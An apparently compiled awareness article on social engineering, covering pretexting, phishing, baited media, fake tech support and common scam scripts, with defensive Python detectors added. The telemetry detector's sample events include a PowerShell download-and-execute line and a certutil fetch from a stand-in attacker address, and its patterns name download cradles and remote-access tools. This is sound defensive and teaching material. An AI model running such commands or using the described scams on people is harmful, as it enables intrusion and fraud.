Social engineering


Since the advent of computers and the early days of the Internet, programmers have done everything they could to make computer systems secure, yet even today no one has achieved this 100%. Suppose, though, that it had been achieved through strong cryptography, hardened security protocols, reliable software and other security controls. The result would be an absolutely secure network in which we could work safely.

"Wonderful!" you will say, "it's in the bag!" But you would be wrong, because this is not enough. Why? Because the benefits of any computer system can only be obtained with the participation of users, that is, people. It is precisely this interaction between computer and person that carries a serious danger, and the person often turns out to be the weakest link in the chain of security measures. Moreover, the person is often the very reason security fails.

In the information age it has become easier to manipulate people, because the Internet and mobile communications allow interaction without direct contact. There are even special methods that help attackers handle people the way they want. Taken together, these methods are called social engineering, and in this article we will try to work out what it is.

Social engineering: what is it and how did it appear?

It is easy to see that even the most sophisticated security system is vulnerable when it is operated by a person, especially a gullible or naive one. And when a machine (PC) is attacked, the victim may be not only the computer but also the person who works on it.

In the slang of social hackers this kind of attack is called social engineering. In its traditional form it is a telephone call in which the caller pretends to be someone else in order to extract confidential information, most often passwords, from the person on the line. In our articles, however, we will treat social engineering more broadly, meaning by it any method of psychological manipulation: blackmail, playing on feelings, deception and so on.

In this sense, social engineering is a way of controlling people's actions without the use of technical means. It is most often seen as an illegal way of obtaining valuable information of various kinds, and it is used mainly on the Internet. If you want an example of social engineering, here is one of the most striking:

EXAMPLE: An attacker wants to learn the password to a person's online banking account. He calls the victim, introduces himself as a bank employee and asks for the password, citing serious technical problems in the bank's systems. To be more convincing, he gives an employee's name (fictitious, or a real one found out in advance), position and authority if needed. To make the victim believe him, the social hacker fills his story with plausible details and plays on the victim's feelings. Having obtained the information, he still takes care to say goodbye politely to his "client", then uses the password to log in to the account and steal the funds.

Oddly enough, even today there are people who fall for such bait and trustingly tell social hackers everything they want to know. And the latter have many tricks and techniques in their arsenal. We will describe them too, but a little later.

Social engineering as a discipline appeared relatively recently. Its sociological significance lies in the fact that it works with specific knowledge that guides, systematizes and optimizes the creation, modernization and application of new social realities. In a sense it complements sociology, turning scientific knowledge into algorithms for activity and behavior.

People have used social engineering in one form or another since ancient times. In Ancient Rome and Ancient Greece, for example, specially trained rhetoricians who could convince an interlocutor that he was "wrong" were highly respected; they took part in diplomatic negotiations and solved affairs of state. Later, social engineering was adopted by intelligence agencies such as the CIA and the KGB, whose agents successfully impersonated anyone they needed to and extracted state secrets.

By the early 1970s telephone pranksters had appeared who disturbed the peace of various companies for a joke. Over time someone realized that with a technical approach one could quite easily obtain all sorts of important information. By the end of the 1970s the former pranksters had become professional social engineers (in slang, "singers"), capable of manipulating people masterfully and reading their complexes and fears from intonation alone.

When computers appeared, most singers switched fields and became social hackers. Today the terms "social engineering" and "social hacking" are used as synonyms. With the rapid development of social engineering, new varieties emerged and the arsenal of techniques expanded.


Social engineering methods

All real examples of social engineering show that it adapts easily to any conditions and any situation, and the victims of social hackers, as a rule, do not even suspect that a technique is being used against them, let alone know who is behind it.

All social engineering methods are based on trust. This is the so-called cognitive basis: people in a social environment always tend to trust someone. The main methods of social engineering are:

  • "Trojan horse"
  • Pretexting
  • "Road Apple"
  • Phishing
  • Quid pro quo

Let's look at each of them in more detail.

"Trojan horse"

The "Trojan horse" exploits a person's curiosity and desire for gain. Social hackers send the victim an e-mail with an attractive attachment: an update for some program, a screen saver with erotic content, sensational news, and so on. The goal is to get the user to open a file that infects the computer with malware. A common result is a screen-locking banner that can be removed in only two ways: by reinstalling the operating system or by paying the attackers a certain sum.

Pretexting

Pretexting means getting the user to act on the basis of a prepared pretext, that is, a script. The goal is to have the person disclose specific information or perform a specific action. Pretexting is mostly used over the phone, although there are examples of similar attacks over Skype, Viber, ICQ and other instant messengers. To pull it off, the singer or hacker must research the target in advance: learn their name, date of birth, place of work, account balance and so on. Such details increase the victim's confidence in the caller.

"Road Apple"

The road apple method is an adaptation of the "Trojan horse" and necessarily involves a physical storage medium. Social hackers plant bootable flash drives or discs disguised as media with interesting and/or unique content. All that is needed is to slip the "road apple" to the victim unnoticed, for example into a car in a parking lot or a bag in an elevator, or simply to leave the "fruit" where the victim is likely to see it and pick it up.

Phishing

Phishing is a very common method of obtaining confidential information. In its classic form it is an "official" e-mail (from a payment service, a bank, a senior official, etc.) complete with signatures and seals. The recipient is asked to follow a link to a fake website, which likewise carries every sign of "officiality and reliability", and to enter some data: full name, home address, phone number, social network profiles, bank card number (and even the CVV code!). Having trusted the site and entered the data, the victim hands it to the scammers, and what happens next is easy to guess.

Quid pro quo

The quid pro quo method is used to introduce malware into companies' systems. Social hackers call the target (sometimes any) company, introduce themselves as technical support staff and ask employees whether they have any technical problems with their computers. If there are any, the attackers set about "fixing" them: they ask the victim to enter a certain command, after which they are able to launch malicious software.

The methods above are the ones most often encountered in practice, but there are others. There is also a special kind of social engineering that likewise aims to influence a person and their actions, but works by a completely different algorithm.

Reverse social engineering

Reverse social engineering, and the social hackers who specialize in it, work in three directions:

  • Situations are created that force people to seek help
  • Help with the problem is advertised (this can include genuine assistance from real specialists offered in advance)
  • "Help" is provided, and influence is exerted in the process

With this type of social engineering, the attackers first study the person or group they plan to influence: their passions, interests, desires and needs. Influence is then exerted through these, using software and other electronic means. Importantly, the software must at first work flawlessly so as not to raise concern, and only later switch to malicious mode.

Examples of reverse social engineering are also not uncommon, and here is one of them:

Social hackers develop a program for a specific company, tailored to its interests. The program contains a slow-acting virus that activates after three weeks, and the system begins to malfunction. Management contacts the developers for help. Prepared for exactly this turn of events, the attackers send their "specialist", who, while "solving the problem", gains access to confidential information. The goal is achieved.

Compared with conventional social engineering, the reverse kind is more labor-intensive, requires special knowledge and skills, and is used to influence a wider audience. But the effect is striking: the victim, without any resistance, that is, of their own free will, reveals all their cards to the hackers.

Thus, any kind of social engineering is almost always used with malicious intent. Some, of course, speak of its benefits, pointing out that it can be used to solve social problems, sustain social activity and even adapt social institutions to changing conditions. Nevertheless, it is most successfully used for:

  • Deceiving people and obtaining confidential information
  • Manipulating and blackmailing people
  • Disrupting companies' operations in order to destroy them
  • Database theft
  • Financial fraud
  • Competitive Intelligence

Naturally, this could not go unnoticed, and methods to counter social engineering appeared.

Protection against social engineering

Today large companies systematically run all kinds of tests of their resistance to social engineering. The actions of people who fall under attack by social hackers are almost never intentional, but that is exactly what makes them dangerous: an external threat is relatively easy to defend against, an internal one far harder.

To improve security, management conducts specialized training, monitors its employees' level of knowledge, and stages internal attacks of its own to gauge how prepared people are for social hackers, how they react, and how conscientious and honest they are. For example, "infected" letters can be sent to employees' e-mail, or contact can be made via Skype or social networks.

Protection against social engineering can be either human or technical. In the first case, people's attention is drawn to security issues, the seriousness of the problem is explained, security policies are instilled, and protective methods and actions are studied and put into practice with supporting information. All this has one drawback: these measures are passive, and many people simply ignore the warnings.

Technical protection includes means that impede access to information and its use. Since the most "popular" social hacking attacks on the Internet arrive as e-mails and messages, programmers create special software that filters all incoming data, both for private mailboxes and for internal mail. Filters analyze the text of incoming and outgoing messages. There is a difficulty here: such software loads the servers, which can slow down or disrupt the system, and it is impossible to anticipate every variation of a potentially dangerous message. Still, the technology keeps improving.

As for the means that specifically prevent use of the data obtained, they fall into two groups:

  • Blocking use of the information everywhere except the user's workplace (authentication data is tied to electronic signatures and to the serial numbers of PC components, physical and IP addresses)
  • Blocking automated use of the information (this includes the familiar CAPTCHA, which shows a distorted image that a person can read but a script cannot)

Both methods defeat automation and shift the balance between the value of the information and the effort of exploiting it toward effort. So even with all the data handed over by unsuspecting users, social hackers face serious difficulty putting it to practical use.

To an ordinary person we advise simply staying vigilant. When you receive an e-mail, read the text and the links carefully and try to understand what it is about, who it came from and why. Do not forget to use antivirus software. If strangers call from an unfamiliar number, never give out personal information, especially anything related to your finances.


Finally, we want to introduce you to some books on social engineering, including as a field of sociological knowledge, so that you can get to know the topic in more detail if you wish.

These books contain many practical recommendations on how to master common manipulative techniques and techniques. You will also learn about the most effective methods of social engineering and learn how to recognize them and protect yourself from attacks.

Books on social engineering:

  • Kevin Mitnick, "Ghost in the Wires"
  • Kevin Mitnick, William Simon, "The Art of Intrusion"
  • Kevin Mitnick, William Simon "The Art of Deception"
  • Chris Kaspersky "The Secret Weapon of Social Engineering"

Remember that anyone can master the art of directing the actions of others, but these skills must be used for people's benefit. Sometimes guiding a person toward decisions that benefit us is useful and convenient. It is much more important, though, to be able to recognize social hackers and deceivers so as not to become their victim, and more important still not to become one of them yourself. We wish you wisdom and useful life experience!

Generally, social engineering is a set of techniques aimed at getting a person to behave in a certain way because someone needs it: to hand over money, to provide secret information, to sign something. Doing so usually requires studying the human factor: how people react to requests and complaints, what causes them stress, and so on. Knowing the attitudes and reactions of most people, it is not hard to make them do certain things.

How social engineering is related to fraud and how it is used to obtain forbidden information.

Let's look at social engineering from these two angles. You may have noticed that scammers are always especially active in hard economic times. In our technological age they are becoming ever better prepared and trained. They draw on psychology, social engineering, IT and much other specialized knowledge to steer people's actions. There is not time to study all their tricks, but it is still worth understanding the basic principles behind the tricks and technologies they use, so as not to fall into the traps they set.

We have already written on this site about which people are most likely to become victims and how not to fall victim to people and circumstances. Now let's talk briefly about a special science whose knowledge "advanced" scammers, the social engineers, put to use.

Social engineering as a science.

Social engineering is a fairly young science that draws on knowledge of people's psychology and their behavior in critical situations. It could also be called "a collection of human errors", since it absorbs everything related to the human factor and its exploitation.

Such knowledge lets one predict likely human behavior and design situations that elicit a particular reaction. The reaction provoked by the scammer, the social engineer, leads the person to exactly the actions that were the scammer's goal from the start. What might that goal be? To obtain information, to get into someone else's premises, or simply to get your money. For this reason social engineers are also called social hackers.

What kind of person is this social engineer?

This is a person who possesses and skillfully uses knowledge from social engineering. This is a “psychologist” (not a professional, of course), who takes into account complexes, weaknesses, prejudices, habits, reflexes, etc. of people.

Kevin Mitnick, a former social hacker who now consults on security, has said that it is far easier to coax out the needed information with a trick than to write programs for breaking in.

How to protect yourself from “social hackers”?

This can be very difficult, almost impossible, if you know nothing about them. And even knowing their tricks you can take the bait, because they are experts in your spontaneous reactions, reflexes, automatic habits and so on. Be careful!

For instance, just recently, in January, the Internet was full of the following news:


The hackers' calculation was simple: the recipients of the mailing would carry out the scammers' request, made in the name of management, to avoid a reprimand from that management. And so it happened. Following the social hackers' instructions, employees of the Belgian bank Crelan performed the actions the scammers required without any additional checks. The hackers' e-mail contained a request to complete a transaction urgently. It looked quite believable, since the criminals used copies of company logos and well-known domains.

Psychologists had run similar experiments before the Belgian bank incident. Researchers in England sent employees of a large corporation messages in the name of their company's system administrator, asking them to send in their passwords because of a scheduled equipment check. The result was sad: most of the employees (75%) followed the attackers' instructions.

As we can see, human actions are quite easy to program. Moreover, quite smart, educated and highly intelligent people fall for scammers. There is nothing strange about this, given that other people study the actions, habits and reactions of all sorts of people, including very smart ones.

EXAMPLES of using social engineering methods

One social engineer describes how he got into a restricted area by exploiting people's stereotyped thinking. Security guards are people too! He observed what badges employees of the company he targeted wore, made himself an identical one on a computer printer, and walked in through the back door together with the company's staff.

Of course he had no chip for the doors, so he used the "train" method. Its essence is simple: when a group of people gathers at the door, it never closes fully, and those in front hold it for those behind. Common courtesy. After all, the badge shows this is an employee too. The guards see a crowd of people with identical badges and pay little attention. And this despite a poster on the wall, in large letters, warning that everyone must pass through one at a time and that holding the door for the person behind you is forbidden for the sake of general security. But will a group of friendly colleagues do that? Who in this company will say to someone: "Please step back out and come in with your own key (chip), because I don't know you"? The likelihood is very low. Yet that is exactly what should be done.

So employees violate security requirements with enviable consistency, and scammers exploit the automatic habits described above with the same consistency. There will always be people who go along with scammers, no matter how much they are warned and trained. Social engineers know this well and therefore do not bother much about inventing new tricks; they simply reuse the same methods, because people's habits change little, which is what makes them habits. Be original. Don't think in stereotypes! Always be wary of unexpected or frightening messages. Pay attention to warning notices.

The most widely used social engineering techniques rely on human weaknesses such as pity, fear and the desire to get rich quickly. Hackers exploit pity in many different ways, for example by sending messages by phone or through social networks asking for help on behalf of your friends or relatives.

Basic methods and techniques of social engineers / social engineering

All social engineering methods rest on the human factor, that is, on features of the human psyche: panicking, reacting the same way in certain circumstances, losing vigilance, getting tired, empathizing, feeling fear, and much more. Here are just a few techniques as examples; try to work out for yourself which mental trait the social engineer is using in each:

    1. One plot goes like this: a friend is out of town and cannot call right now, there is a serious problem and money is urgently needed; please send it to this account or card number. Not everyone will respond, only a certain percentage of recipients, and the hacker knows this. It does not bother him, because the messages he has scripted are sent out by a machine. There are always some who help immediately without checking where the SMS came from. After all, a friend is in trouble, and because of the urgency many do not check the source.
    2. With the same calculation, some time ago many women received SMS messages from a "son" in trouble. He, of course, could not call back until his mother sent money to solve the problem. And mothers sent it, with no idea where or to whom, without double-checking anything (as the "son" had asked).
    3. Personal information is also stolen, and malicious links sent, on behalf of friends, with comments such as: "Hey, want a laugh? Follow this link and you can listen to any phone conversation (or read any SMS exchange) you like." Or something similar; the point is to get you to click the link.

Social engineers also have a "buyer" routine. Many users list items for sale, for example on Avito. Such a "buyer" looks for something expensive (cars, houses, etc.), contacts the real seller and announces his wish to buy the item. Naturally the seller is pleased: sold so fast, before there was even time to show it off, and he is already counting the income in his head. Unfortunately, the buyer says, he can only collect the item in two or three days. So that you do not sell it to someone else in the meantime, he asks you to take the ad down and, as a guarantee, offers to pay half or even 75% of the price today. "Of course!" you think, "with pleasure, let him pay!" The "buyer" asks which card to transfer the money to, and you tell this stranger all your card details. Instead of receiving his money, you lose all your savings. He may also ask you to read out the code sent to your phone.

As for the desire to get rich quickly and without much effort, this is a vice social engineers can exploit endlessly, because people themselves look for such "adventures" and are ready to step on the same rake again and again. So the swindlers keep posing as a famous brand giving away lavish gifts, a company promising tempting discounts, a bank offering a loan at a derisory rate, an employer who will help you earn easy money online or elsewhere... Only, to receive any of it you must first provide your card details, since a new employer or a kind bank has to transfer your money somewhere. Once the card details have been given to a stranger, you can say goodbye to what was on it.

Why do you need to know about this?

Interest in social engineering has grown a great deal recently, as the popularity of the search term on the Internet shows. This means the number of hackers, and the demand for programs to protect against their attacks, will only grow. And not only hackers: swindlers of every kind use social engineering methods for their own ends.

To be informed and therefore armed, you can read the literature on this topic:

  • Maxim Kuznetsov, Igor Simdyanov, "Social Engineering and Social Hackers"

Be careful! Don't let yourself be deceived.

Social engineering uses knowledge of psychology and human factors. Be extremely careful, social hackers know you very well.



Social engineering is a method of obtaining access to information that relies on the characteristics of human psychology. Its main goal is to gain access to confidential information, passwords, banking data and other protected systems. Although the term itself appeared not so long ago, obtaining information this way has been practiced for a long time. CIA and KGB officers after state secrets, politicians and parliamentary candidates, and we ourselves when we want something, often use social engineering methods without even realizing it.

In order to protect yourself from the effects of social engineering, you need to understand how it works. Let's look at the main types of social engineering and methods of protecting against them.

Pretexting is a set of actions carried out according to a specific, prepared scenario, as a result of which the victim gives out some information or performs a certain action. This type of attack usually involves voice channels such as Skype or the telephone.

To use this technique the attacker must already hold some data about the victim (an employee's name, position, the projects they work on, date of birth). The attacker starts with plausible requests that mention the names of real company employees and, having gained trust, obtains the information he needs.

Phishing is an Internet fraud technique aimed at obtaining confidential user information, namely credentials for various systems. The main form of phishing attack is a fake e-mail sent to the victim that appears to be an official letter from a payment system or bank. The letter contains a form for entering personal data (PIN codes, login and password, etc.) or a link to a web page with such a form. The pretext for the victim's trust in such pages varies: account blocking, a system failure, data loss and so on.
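The two tells described here, a link whose visible text names one site while its href leads to another, and a host name that merely imitates a trusted brand, can be checked mechanically; this is the kind of analysis the mail filters mentioned in the protection section above perform. The following Python is an added example written for this page, not code from the original article or from any mail-filtering product. The trusted domain list, the confusable-character table and the sample message are constructed for the demonstration.

```python
"""Triage the links in a suspected phishing e-mail (added example, constructed data).

Flags visible link text that names one site while the href points to another,
and host names that merely look like a trusted brand.
"""
import re
import unicodedata
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlparse

# Assumption: the organisation's own legitimate domains (constructed).
TRUSTED_DOMAINS = {"examplebank.com", "pay.examplebank.com"}

# Digit/symbol substitutions commonly used to build look-alike names.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "$": "s"})


def normalize(domain: str) -> str:
    """Lower-case, decode punycode, strip accents and collapse confusable characters."""
    domain = domain.lower().rstrip(".")
    if "xn--" in domain:
        try:
            domain = domain.encode("ascii").decode("idna")
        except UnicodeError:
            pass
    # NFKD splits an accented letter into base letter + combining mark; drop the marks.
    domain = unicodedata.normalize("NFKD", domain)
    domain = "".join(c for c in domain if not unicodedata.combining(c))
    return domain.translate(CONFUSABLES)


def registrable(domain: str) -> str:
    """Crude eTLD+1 (last two labels); a real deployment would use the Public Suffix List."""
    parts = domain.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else domain


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host: str) -> Optional[str]:
    """Return the trusted registrable domain this host imitates, or None."""
    trusted = {registrable(t) for t in TRUSTED_DOMAINS}
    if registrable(host.lower()) in trusted:
        return None                                   # genuinely ours
    norm = registrable(normalize(host))
    for t in sorted(trusted):
        brand = t.split(".")[0]
        if (norm == t                                 # examp1ebank.com, exámplebank.com
                or levenshtein(norm, t) <= 1          # examplebank.co
                or brand in norm.split(".")[0]):      # examplebank-verify.net
            return t
    return None


class _LinkParser(HTMLParser):
    """Collect (href, visible text) pairs from <a> elements."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = (dict(attrs).get("href") or ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


# A domain or URL written out in the link's visible text.
DOMAIN_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})", re.I)


def triage_links(html: str) -> list:
    """One finding per suspicious link: look-alike host and/or text/href mismatch."""
    parser = _LinkParser()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        host = urlparse(href).hostname or ""
        issues = []
        imitated = lookalike_of(host)
        if imitated:
            issues.append(f"host {host} looks like {imitated}")
        shown = DOMAIN_IN_TEXT.search(text)
        if shown and registrable(shown.group(1).lower()) != registrable(host.lower()):
            issues.append(f"text shows {shown.group(1)} but href goes to {host}")
        if issues:
            findings.append({"href": href, "text": text, "issues": issues})
    return findings


# Constructed sample message body.
SAMPLE_HTML = """
<p>Dear customer, your account has been blocked after a system failure.</p>
<a href="https://secure-login.examp1ebank.com/restore">https://examplebank.com/restore</a>
<a href="https://www.examplebank.com/help">Help centre</a>
<a href="http://examplebank-verify.net/confirm">Confirm your card now</a>
"""
```

Calling triage_links(SAMPLE_HTML) reports the first and third links (a look-alike host, plus a text/href mismatch on the first) and leaves the genuine help-centre link alone. The brand-substring check deliberately errs toward false positives: a legitimate partner domain that contains the brand name is rare and cheap to allowlist, while a missed look-alike is not.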

Trojan horse is a technique that plays on the curiosity, fear or other emotions of users. The attacker sends the victim an e-mail whose attachment contains an antivirus "update", a key to a cash prize, or compromising material on an employee. In fact the attachment contains a malicious program, which, once the user runs it on his computer, the attacker will use to collect or alter information.

Quid pro quo is a technique in which the attacker contacts the user by e-mail or corporate telephone. The attacker may introduce himself, for example, as a technical support employee and report that technical problems have arisen at the user's workstation, then say they need to be fixed. While "solving" the problem, the attacker gets the victim to take actions that allow the attacker to run certain commands or install the software he needs on the victim's computer.
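The commands a "support engineer" talks a victim through leave traces in process-creation telemetry: an encoded PowerShell command, a certutil or bitsadmin download, a remote-access tool run straight from the Downloads folder. The detection below is an added example, not code from the original article or from any product. The key=value event format, the host, the user name and the URLs are constructed, 198.51.100.7 is a documentation address, and real events would come from a source such as Sysmon event 1 or Windows Security event 4688.

```python
"""Spot the commands a 'tech support' caller talks a victim into running.

Added example with a constructed key=value event format; hosts, users and
URLs are invented. Scans process-creation events for download cradles,
encoded PowerShell and remote-access tools launched during the call.
"""
import base64
import re

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

REMOTE_ACCESS_TOOLS = {"anydesk.exe", "teamviewer.exe", "teamviewer_setup.exe", "ultraviewer.exe",
                       "supremo.exe", "rustdesk.exe", "screenconnect.clientsetup.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
USER_APPS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe", "winword.exe", "excel.exe"}
# Living-off-the-land download/execution patterns, matched against the raw
# command line plus any decoded -EncodedCommand payload.
CRADLES = [
    (re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I), "certutil download"),
    (re.compile(r"bitsadmin(\.exe)?\s.*/transfer", re.I), "bitsadmin download"),
    (re.compile(r"mshta(\.exe)?\s+https?://", re.I), "mshta remote script"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\s|\bcurl\s|\bwget\s", re.I),
     "PowerShell download cradle"),
    (re.compile(r"\biex\s|invoke-expression", re.I), "in-memory execution"),
]


def parse_event(line: str) -> dict:
    """Turn 'k=v k="quoted v"' into a dict with the quotes stripped."""
    return {k: v.strip('"') for k, v in KV.findall(line)}


def decode_encoded_command(cmd: str) -> str:
    """Decode a -e/-ec/-enc/-EncodedCommand payload (base64 of UTF-16LE), or return ''."""
    m = re.search(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", cmd, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse(lines) -> list:
    """Return one finding per event that matches quid pro quo tradecraft."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        proc, parent, cmd = ev.get("proc", "").lower(), ev.get("parent", "").lower(), ev.get("cmd", "")
        reasons = []
        decoded = decode_encoded_command(cmd) if proc in {"powershell.exe", "pwsh.exe"} else ""
        if decoded:
            reasons.append("encoded PowerShell command: " + decoded[:60])
        for pattern, label in CRADLES:          # keywords hide inside the base64, so match the decoded text too
            if pattern.search(cmd + " " + decoded):
                reasons.append(label)
        if proc in REMOTE_ACCESS_TOOLS:
            reasons.append("remote-access tool started")
            if "\\downloads\\" in ev.get("path", "").lower():
                reasons.append("run from the Downloads folder, i.e. fetched during the call")
        if proc in SCRIPT_HOSTS and parent in USER_APPS:
            reasons.append(f"script host spawned by {parent}")
        if reasons:
            findings.append({"time": ev.get("time"), "user": ev.get("user"), "proc": proc, "reasons": reasons})
    return findings


# Constructed sample events. The encoded command is built here so the reader
# can see what the base64 blob stands for.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/fix.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    'time=2024-03-05T10:02:11Z host=WS-17 user=j.smith parent=explorer.exe proc=winword.exe cmd="winword.exe Q1.docx"',
    f'time=2024-03-05T10:09:40Z host=WS-17 user=j.smith parent=cmd.exe proc=powershell.exe cmd="powershell -nop -w hidden -enc {ENC}"',
    'time=2024-03-05T10:11:03Z host=WS-17 user=j.smith parent=cmd.exe proc=certutil.exe '
    'cmd="certutil -urlcache -split -f http://198.51.100.7/update.exe C:\\Users\\j.smith\\AppData\\Local\\Temp\\update.exe"',
    'time=2024-03-05T10:15:22Z host=WS-17 user=j.smith parent=chrome.exe proc=AnyDesk.exe '
    'path="C:\\Users\\j.smith\\Downloads\\AnyDesk.exe" cmd="AnyDesk.exe"',
    'time=2024-03-05T10:20:00Z host=WS-17 user=j.smith parent=explorer.exe proc=powershell.exe cmd="powershell -File C:\\Scripts\\backup.ps1"',
]
```

analyse(SAMPLE_EVENTS) flags the encoded download cradle, the certutil fetch and the AnyDesk launch, and leaves the Word document and the scheduled backup script alone. Decoding -EncodedCommand before matching is the important step: the base64 blob itself contains none of the keywords, which is exactly why callers use it.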

Road apple is an adaptation of the Trojan horse that uses physical media (CDs, flash drives). The attacker usually plants such media in public places on company premises (parking lots, canteens, employee workplaces, toilets). To make an employee curious, the attacker may put a company logo and some caption on the medium, for example "sales data", "employee salaries", "tax report" and the like.
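Both the "Trojan horse" attachment and the "road apple" medium, here and in the first part of the article, depend on a file that looks like a document but runs code, and the file name alone gives much of that away: a double extension, a right-to-left override that hides the real extension, a shortcut or script behind a document icon, an autorun.inf on the medium, a macro-enabled workbook with a tempting caption. The following Python is an added example, not code from the original article. The extension sets, lure words and sample names are constructed, and the checks never open or execute a file.

```python
"""Triage file names from an e-mail attachment or a found USB stick.

Added example; extension sets, lure words and sample names are constructed.
Only names are inspected, nothing is opened or executed.
"""
import os
import re
import unicodedata

EXECUTABLE = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".msi", ".hta", ".js", ".jse",
              ".vbs", ".vbe", ".wsf", ".ps1", ".lnk", ".dll", ".cpl"}
CONTAINERS = {".iso", ".img", ".vhd", ".vhdx"}        # mount-and-run lures
MACRO_DOCS = {".docm", ".xlsm", ".pptm", ".dotm"}
DOCUMENT_LIKE = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt", ".jpg", ".png", ".mp4"}
# Captions the article names as bait, plus a few more (assumption).
LURE_WORDS = ("salar", "password", "confidential", "tax", "bonus", "sales", "photos", "private")
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")
RANK = {"low": 0, "medium": 1, "high": 2}


def extensions(name: str) -> list:
    """All dotted suffixes, lower-cased and trimmed: 'a.xlsx.exe' -> ['.xlsx', '.exe']."""
    parts = name.lower().split(".")
    return ["." + p.strip() for p in parts[1:]]


def triage_name(name: str) -> dict:
    """Return {'name', 'risk', 'reasons'}; an empty reasons list means nothing suspicious."""
    hits = []                                   # (level, reason)
    exts = extensions(name)
    last = exts[-1] if exts else ""
    if name.lower() == "autorun.inf":
        hits.append(("high", "autorun.inf: the medium tries to start something on insertion"))
    if any(ch in BIDI_CONTROLS for ch in name):
        hits.append(("high", "bidirectional control character hides the real extension"))
    elif any(unicodedata.category(ch) == "Cf" for ch in name):
        hits.append(("high", "invisible formatting character in the name"))
    if last in EXECUTABLE:
        hits.append(("high", f"executable type {last}"))
        if len(exts) > 1 and exts[-2] in DOCUMENT_LIKE:
            hits.append(("high", f"double extension: pretends to be {exts[-2]}"))
    if re.search(r" {5,}\.\w+$", name):
        hits.append(("high", "padding spaces push the real extension out of view"))
    if last in CONTAINERS:
        hits.append(("high", f"disk-image container {last}"))
    if last in MACRO_DOCS:
        hits.append(("medium", f"macro-enabled document {last}"))
    if any(word in name.lower() for word in LURE_WORDS):
        hits.append(("medium", "tempting caption typical of a lure"))
    risk = max((level for level, _ in hits), key=RANK.get, default="low")
    return {"name": name, "risk": risk, "reasons": [reason for _, reason in hits]}


def triage_names(names) -> list:
    """Findings for every name that has at least one reason, in input order."""
    return [r for r in (triage_name(n) for n in names) if r["reasons"]]


def scan_directory(root: str) -> list:
    """Apply the same checks to a mounted medium; only names are read."""
    names = [f for _, _, files in os.walk(root) for f in files]
    return triage_names(names)


# Constructed sample names.
SAMPLE_NAMES = [
    "README.txt",
    "Employee salaries 2023.xlsx",
    "Sales data.xlsx.exe",
    "Tax report\u202efdp.scr",
    "Company photos.lnk",
    "autorun.inf",
    "Quarterly results.docm",
    "Invoice.pdf                          .exe",
]
```

triage_names(SAMPLE_NAMES) flags everything except README.txt: the double and padded extensions, the right-to-left override that displays "Tax report rcs.pdf" while the file is a .scr, the shortcut, the autorun.inf and the macro-enabled workbook. scan_directory() applies the same checks to a mounted stick found in the parking lot, preferably from a non-Windows analysis machine where nothing on it will autorun.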

Reverse social engineering is a type of attack aimed at creating a situation in which the victim is forced to turn to the attacker for "help". For example, the attacker may send a letter with the telephone numbers and contacts of a "support service" and, some time later, cause reversible faults on the victim's computer. The user then calls or e-mails the attacker himself, and while "fixing" the problem the attacker obtains the data he needs.


Figure 1 – Main types of social engineering

Countermeasures

The main defense against social engineering methods is training employees. All company employees should be warned about the danger of disclosing personal information and confidential company information, and about ways to prevent data leakage. In addition, each employee, depending on department and position, should have instructions on how and on what topics they may talk to an outside party, what information may be given to the technical support service, and how and what a company employee must provide in order to receive this or that information from another employee.

In addition, the following rules can be distinguished:

  • User credentials are the property of the company.
  • On the day of hiring, all employees must be told that the logins and passwords issued to them may not be used for other purposes (on websites, for personal mail, etc.) or passed to third parties or to other employees of the company who are not entitled to them. Very often, for example, an employee going on vacation hands his credentials to a colleague so that the colleague can do some work or view certain data during his absence.
  • Introductory and regular information security training must be held for company employees.
  • Such briefings keep employees up to date on existing social engineering methods and remind them of the basic rules of information security.
  • Security regulations, and instructions the user can always consult, are mandatory. The instructions should describe what employees are to do when a particular situation arises.
  • For example, the regulations can specify what to do and whom to contact if a third party tries to request confidential information or employee credentials. Such actions make it possible to identify the attacker and prevent a leak.
  • Employees' computers must always have up-to-date antivirus software.
  • A firewall must also be installed on employee computers.
  • The corporate network needs intrusion detection and prevention systems.
  • Systems to prevent leaks of confidential information are also needed. All this reduces the risk of phishing attacks.
  • All employees must be instructed how to behave with visitors.
  • Clear rules are needed for establishing a visitor's identity and escorting him. Visitors must always be accompanied by a company employee. If an employee meets a visitor unknown to him, he must politely ask why the visitor is in this room and who is escorting him. If necessary, the employee must report unknown visitors to the security service.
  • User rights in the system must be restricted as much as possible.
  • For example, access to websites can be restricted and the use of removable media prohibited. After all, if an employee cannot reach a phishing site or use a flash drive carrying a "Trojan horse", he also cannot lose personal data.

